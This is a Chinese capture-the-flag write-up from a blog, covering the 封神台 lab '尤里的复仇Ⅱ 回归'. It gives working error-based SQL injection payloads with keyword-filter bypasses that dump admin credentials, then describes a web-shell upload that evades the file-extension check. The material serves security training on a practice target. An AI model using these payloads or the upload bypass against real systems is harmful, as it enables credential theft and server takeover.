封神台(尤里的复仇Ⅱ 回归)绕过防护getshell

最新推荐文章于 2023-11-19 15:17:00 发布
最新推荐文章于 2023-11-19 15:17:00 发布
阅读量3.4k 收藏 3
点赞数 1
分类专栏: 封神台靶场 文章标签: 回归 数据库 数据挖掘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43623271/article/details/122310544
版权

解题思路

习惯在url后加admin,看是不是管理后台。
一看发现是,就不用目录扫描工具了
在这里插入图片描述
填入正确的验证码,抓包输入',查看有无报错
发现报错了,存在报错注入,看报错描述可以知道是字符型注入
在这里插入图片描述
查看当前数据库
payload

' or extractvalue(1,concat(0x7e,database()))%23

在这里插入图片描述
查看当前库的所有表
payload

' or extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))%23

爆出错误,可以看到select被吃了
在这里插入图片描述
尝试双写+大小写绕过
payload

user=' or extractvalue(1,concat(0x7e,(SEselectlECT group_concat(table_name)from information_schema.tables where table_schema=database())))%23

select出来了,但是看到=被吃掉了
在这里插入图片描述
使用like替代=
payload

' or extractvalue(1,concat(0x7e,(SEselectlECT group_concat(table_name)from information_schema.tables where table_schema like database())))%23

where去哪了??
在这里插入图片描述
在where后加个*
payload

' or extractvalue(1,concat(0x7e,(SEselectlECT group_concat(table_name)from information_schema.tables WHERE* table_schema like database())))%23

经过一系列的绕过技术,查询语句终于奏效
在这里插入图片描述
extractvalue()函数默认报错显示32个字符,剩下的字符可以用substr(column,31,62)查询后32个字符,以此类推。

payload

' or extractvalue(1,concat(0x7e,(SEselectlECT substr(group_concat(table_name),31,62)from information_schema.tables WHERE* table_schema like database())))%23

在这里插入图片描述

盲猜账号密码在bees_admin表中,直接查bees_admin字段名
payload

' or extractvalue(1,concat(0x7e,(SEselectlECT group_concat(column_name) from information_schema.columns where* table_name like 'bees_admin' and table_schema like database())))%23

这里将空格全部转为%0a,因为有时候可能是匹配关键字+空格导致吃掉关键字,其实从一开始就把空格变为%0a,就可以不用绕过太多关键字
payload

'%0aor%0aextractvalue(1,concat(0x7e,(SEselectlECT%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere*%0atable_name%0alike%0a'bees_admin'%0aand%0atable_schema%0alike%0adatabase())))%23

我这里写了个py脚本进行转换

sql = r"""' or extractvalue(1,concat(0x7e,(SEselectlECT group_concat(column_name) from information_schema.columns where* table_name like 'bees_admin' and table_schema like database())))%23"""
# 将空格替换成%0a
def spaceBypass(sql):
    str = sql.replace(' ','%0a')
    return str
sql = spaceBypass(sql)
print(sql)

可以查询到bees_admin的字段
在这里插入图片描述
接下来查询admin_name和admin_password的值
原来payload

' or extractvalue(1,concat(0x7e,(SEselectlECT group_concat(concat(admin_name,':',admin_password)) from bees.bees_admin)))%23

绕过空格payload

'%0aor%0aextractvalue(1,concat(0x7e,(SEselectlECT%0agroup_concat(concat(admin_name,':',admin_password))%0afrom%0abees.bees_admin)))%23

在这里插入图片描述
防止还有字符没显示出来,使用substr(str,31,62)查看一下后面的内容
payload

'%0aor%0aextractvalue(1,concat(0x7e,substr((SEselectlECT%0agroup_concat(concat(admin_name,':',admin_password))%0afrom%0abees.bees_admin),31,62)))%23

可以看到flag
在这里插入图片描述
注意:这里的4跟前面最后一个4是重复的
继续往后查询
substr(str,62,93)

'%0aor%0aextractvalue(1,concat(0x7e,substr((SEselectlECT%0agroup_concat(concat(admin_name,':',admin_password))%0afrom%0abees.bees_admin),62,93)))%23

在这里插入图片描述
将上面flag组合起来就是flag:47ec2dd791e31e2ef2076caf64ed9b3d
解码test123456,拿去一试发现错误,已经习惯了
只好查询账号密码登录后台
组合admin:21232f297a57a5a743894a0e4a801fc3
在这里插入图片描述
所以账号密码就是admin admin
在这里插入图片描述
找到上传点,上传一句话
在这里插入图片描述
shell.jpg内容如下
在这里插入图片描述
上传的时候抓包,修改后缀名为php,从而绕过前端后缀名验证
在这里插入图片描述
上传成功
在这里插入图片描述
可以在burpsuite看到上传点
在这里插入图片描述
浏览器访问上传点看能否访问
接着使用蚁剑连接
在这里插入图片描述

在这里插入图片描述
连接成功,开始找flag
在这里插入图片描述
在BEES根目录下找到flag.txt
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

活着Viva
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
尤里复仇WIN10全屏切换不黑屏补丁
07-29
把补丁放入游戏目录就可以了,网上一直没找到,提取的另外版本弄来的反复测试了很久找到的文件大家给个辛苦积分,红色警戒2尤里复仇V1.001版测试成功,时间2023-7-29
易语言红警2尤里复仇修改器源码.rar
12-18
修改金币,建筑秒建,适于新手练习找基址和冷却地址
神台-尤里复仇II 回归sql-注入绕过防护getshell
m0_72592923的博客
01-14 601
神台-尤里复仇II 回归sql-注入绕过防护getshell
神台靶场学习-sql-注入绕过防护getshell
最新发布
buggun6的博客
11-19 299
很好,没花啥功夫就找到了上传点,要求我们只允许上传的图片类型:gif|jpeg|png|jpg|bmp。总结:这次靶场个人感觉质量还是挺高的,和之前省赛的题有点像, 自己要坚持努力学习!好的进入后台了,现在要找flag很明显就不得不找找文件上传点写码上传试试了。很明显没有返回我们想要的东西,联合注入这条路估计是行不通了。ok,既然拿到用户名和密码了,不直接登录还有其他选项吗。解密发现密码也是admin,好家伙,弱口令是吧(nice,报错注入可以,我们发现数据库了。
神台靶场-尤里复仇-第二章
weixin_58373549的博客
01-29 605
神台靶场-尤里复仇-第二章:遇到阻难!绕过WAF过滤!【配套课时:SQL注入攻击原理 实战演练】
神台靶场-sql-注入绕过防护getshell
weixin_43446292的博客
03-10 5521
url为http://rhiq8003.ia.aqlab.cn/bees/,此页面尝试sql注入,不成功;在路径后面加admin可以跳转到管理员登录界面, http://rhiq8003.ia.aqlab.cn/bees/admin 在登录框测试sql注入,输入admin’/123456(直接使用admin/admin即可成功登录) 报错,存在字符型注入,使用报错注入进行测试,根据响应结果可知对and过滤,使用双写 admin’ an and d updatexml(1,concat(0x7e,(sel
神台尤里复仇回归)渗透第一步 信息收集1
Bu2n的博客
01-02 4513
前言解题过程 前言 做这道题的时候,我的心情真是跌宕起伏。。为什么这么说,且听我娓娓道来。 解题过程 打开传送门,被传送到这个网站 随便点了几个模块,感觉都没有可利用的漏洞,直接扫描目录去了 扫到了admin目录,这个应该是后台登录网址,打开一看果然是 一开始密码暴力破解,没有破解到,开始有点烦躁。 (暴力破解.jpg)这里就不放burp破解的图了,有兴趣可以自己去试 然后想是否存在sql注入绕过密码登录的方法,试了试 无果 那报错注入呢? 输入 ' or gtid_subset(concat.
YuriExtension:命令与征服尤里复仇的修复和扩展
06-10
它是什么? YuriExtension 是命令与征服 Yuri's Revenge 的修复和扩展,旨在在现代 Microsoft Windows 上运行。 目前可用的功能 使用 UDP 代替 IPX 能够在 Windows Vista 及更高版本上播放网络。...
红色警戒尤里复仇魔改
01-16
内容丰富极小极大搜索算法 alpha-beta剪枝算法 课后习题 PPT 提高博弈程序效率 (PS:极大极小值算大应该是深度
局域网对战玩红警红色警戒--尤里复仇.pdf
11-06
局域网对战玩红警红色警戒--尤里复仇.pdf
登录别人的账户(仅在封神台靶场).mp4
04-07
这个教程仅在封神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神台靶场 绕过防护getshell
devil8123665的博客
09-24 4281
神台 https://hack.zkaq.cn/battle 靶场 http://59.63.200.79:8003/bees/ 一 爬取方法 1 针对本题目而言,是很简单的,只需要暴出站点的目录就能在根目录下找到flag.txt 御剑扫描:需要在御剑的字典中添加flag.txt等相关关键字 访问链接即可获得flag值。 2 或者使用其他的爬虫或者是扫描工具只要能获的站点目录,就能找到flag.txt 二 注入方法 1 通过kali dirb 暴出目录,找到http://59.6.
神台-getshell
xixihahawuwu的博客
11-26 369
有个小提示 进入靶场 御剑扫描一下 我们得到了一个admin/login.php 这个看着就很敏感。猜测是管理员的登录界面 访问进去果然是管理员的登录界面 我们转到虚拟机中去,使用bp抓下包 这里可能有的盆友和我一样,一开始验证码的模块没有显示出来。得调一下比例才可以把验证码的框显示出来。虚拟机浏览器比例的问题 输入用户名密码验证码,抓包 发送到repeater模块 寻找注入点 先尝试着在用户名处修改 存在注入点。这里有一个问题,就是我在第一次抓包修改用户名上传后返回的提示信息是验证码不正确,猜测这里.
php数据库加密模式,PostgreSQL数据库用户密码的加密方式
weixin_36303462的博客
03-18 312
PostgreSQL数据库用户密码的加密方式 先谈一下postgresql中涉及用户密码的几张表: select username,passwd from pg_shadow; select rolname,rolpassword from pg_authid; select usename,passwd from pg_user; select rolname,rolpassword from ...
掌控靶场 尤里复仇回归sql-注入绕过防护getshell
sagat110的博客
12-27 509
央企扫地僧重拾渗透,在掌控学院的靶场练习闯关过程中,记录一些心得体会,信息收集、sql注入、弱口令、一句话木马等手段的综合利用,成功拿到flag
尤里复仇II 回归
sparename的博客
09-07 974
尤里复仇II 回归渗透第一步-信息收集 1渗透第一步-信息收集 2 渗透第一步-信息收集 1 Tips: 信息收集作为渗透测试的第一步,能决定后续测试的走向,甚至能直接找到目标的漏洞,那么如何才能在繁杂的网络世界里找到所需的数据呢? 尤里开始了努力…… 最终他找到了目标的…… 成功掌握了这一技能 基础目录扫描 传送门 题解:非常简单的目录扫描 直接用御剑扫描 不过flag在二级目录里 flag_{oh!you_find_it!} 渗透第一步-信息收集 2 Tips: 经过上次的事件,尤里
神台-第二章 尤里复仇
ploto_cs的博客
09-26 2032
神台-第二章 尤里复仇 1. 任意选择一条新闻动态 2. 发现出现交互界面 url中id=170 存在注入点 3.判断字段数 ?id=170+order+by+10 ?id=170+order+by+11 4.使用modheader 直接在url中输入 报错 第一个字段写cookie 第二个字段 id=170+UNION+SELECT+1,2,3,4,5,6,7,8,9,10+from+admin 5.在url中输入http://59.63.200.79:8004/shownews.asp
神台 -尤里复仇Ⅰ write up 夜车星繁的博客
夜车星繁的博客
04-09 2692
无意间知道了这个靶场,可作为复习用,就将它安排进了复习计划里,在此篇博客写下记录留作未来回顾用。因为有了点基础在此写下payload只保证自己可以看得懂。 第一章:为了女神小芳! ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 ?id=1 order by 2 ------查询了两列 ?id=100 select 1...
列出所有奥特曼的名字
02-09
3. 尤里·阿尔文 4. 奥特之父 5. 奥特之母 6. 克拉克 7. 格林 8. 奥特兰克 9. 卡拉斯 10. 加登 11. 凯瑟琳 12. 马克斯 13. 梅尔·马克斯 14. 米克 15. 泰罗 16. 泰罗斯 17. 提拉米斯 18. 维克多 19. 维克多·马克斯 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值